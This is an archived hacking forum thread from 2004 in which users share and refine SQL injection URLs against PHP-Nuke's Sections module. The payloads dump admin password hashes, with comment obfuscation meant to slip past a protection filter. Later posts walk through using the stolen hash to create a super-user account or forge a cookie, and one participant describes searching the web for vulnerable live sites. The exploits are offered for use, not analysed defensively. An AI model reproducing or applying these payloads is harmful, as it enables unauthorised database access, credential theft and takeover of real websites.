migo
May 16 2004, 02:57 PM
Hey Guys
i found a new exploit for PHP Nuke but unfortunately it didn't work as posted by the author in rootlab.ru
the problem exist in the Sections module in the variable secid
here is the original exploit that don't work
| CODE |
http: // target/modules.php? name=Sections&op;=listarticles&secid; =-1 UNION SELECT 0,0, pwd, 0,0 FROM nuke_authors/*
|
the corect one modified by me which is working great in all nuke versions is
| CODE |
http://www.victim.com/modules.php?name=Sections&op=listarticles&secid=-1/**/UNION/**/SELECT/**/0,0,pwd,0,0/**/FROM/**/nuke_authors
|
the previous code will display the encrypted hash of the admin account and will evade the stupid proector system as well!
another working one
| CODE |
http://www.victim.com/modules.php?name=Sections&op=listarticles&secid=-1/**/UNION/**/SELECT/**/pwd/**/FROM/**/nuke_authors
|
Note: PHP Nuke is Sh*t
i'll never stop asking people to stop using it!
Best Regards
migo
MpR
May 16 2004, 03:09 PM
niceee
10x
but i need a good new sploit 4 phpbb :|
got 1 ?
migo
May 16 2004, 03:11 PM
soon will be
but the old sploit in the priv_msg value is still working perfect
i do my best to notify everyone i know using phpbb and have this vuln exist
we learn attacks to well defend ourselves
F34R
May 16 2004, 06:01 PM
Old and new sploits alike are welcome here... some of us missed em when they were here before.
Thanks d00d
x1`
May 16 2004, 07:41 PM
when you exploit these php server can u get root and upload files and stuff?
migo
May 16 2004, 08:03 PM
| QUOTE (Dickybob20 @ May 16 2004, 07:41 PM) |
| when you exploit these php server can u get root and upload files and stuff? |
it depend on the modules installed in PHP Nuke , but theorically within most known modules you can include files from the server and you can upload files to the writable folders
but in general it depend on many things
d0whc3r
May 16 2004, 11:07 PM
nice exploit but... how can u identify as an admin when u have md5 pass? most of sites don't accept /admin.php?admin=Encripted...
any solution? any other way to create a user?
thx
whiskah
May 16 2004, 11:55 PM
| QUOTE (d0whc3r @ May 17 2004, 07:07 AM) |
nice exploit but... how can u identify as an admin when u have md5 pass? most of sites don't accept /admin.php?admin=Encripted... any solution? any other way to create a user?
thx |
u have to crack the md5 password using an md5 cracker ..before u can login..I posted an exploit by waraxe earlier on another thread that automatically adds a god admin ..
Mandarins
May 17 2004, 12:03 AM
| QUOTE (d0whc3r @ May 16 2004, 11:07 PM) |
nice exploit but... how can u identify as an admin when u have md5 pass? most of sites don't accept /admin.php?admin=Encripted... any solution? any other way to create a user?
thx |
I am not a pro but such questions ar l#me. Man you are in status of a member and asking question like: how to use copy/paste
If U can't crack the pass, just construct a cookie with it, please don't ask how to do it (use governmentsecurity.org search/ google or there is section 4 the beginners).
No offence but still...
migo
May 17 2004, 06:23 PM
| QUOTE (d0whc3r @ May 16 2004, 11:07 PM) |
nice exploit but... how can u identify as an admin when u have md5 pass? most of sites don't accept /admin.php?admin=Encripted... any solution? any other way to create a user?
thx |
hey
first base64 encode the usernaem and the admin md5 hash that u get
http://www.isecurelabs.com/outils/base64/second use the resulting output to creat the super user accoun with this url
http://localhost/nuke71/admin.php?op=AddAu...nsuper=1&admin=at the last of the above link put after the word "admin=" the base64 encode result that u get in the previous step
use the username "me" and tha password "pass"
boooooom!
easy access to admin panel
didn't i told you that php nuke is sh*t and they fixing it with another one! lol
setthesun
May 17 2004, 06:30 PM
Very good work, thanks a lot.
Also I improved SQL a bit to prevent some possible non-admin MD5 data;
SQL;
/modules.php?name=Sections&op=listarticles&secid=-1/**/UNION/**/SELECT/**/pwd/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*
migo
May 18 2004, 03:04 PM
awesome
nuorder
May 19 2004, 04:24 AM
| QUOTE (MpR @ May 17 2004, 12:09 AM) |
niceee
10x
but i need a good new sploit 4 phpbb :|
got 1 ? |
hahahah now i know why MpR wanted this
liquidSilver
May 19 2004, 04:39 AM
PHP-nuke is sure the devil.
Imps2
May 19 2004, 11:10 AM
Thnx for post but this is what I'm keep getting all the time
Sorry, this Module isn't active!
Greetz Imps2
cagontoo
May 19 2004, 02:17 PM
doesn´t work for me x(
nuorder
May 19 2004, 02:27 PM
| QUOTE |
Thnx for post but this is what I'm keep getting all the time
Sorry, this Module isn't active!
Greetz Imps2 |
it means that they havnt activated that module, the error message says it all
| QUOTE |
| doesn´t work for me x( |
good
Imps2
May 19 2004, 02:43 PM
Jup thnxs for advise now I'm googling on "modules .php sections" and I find working ones
Greetz Imps2
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here.
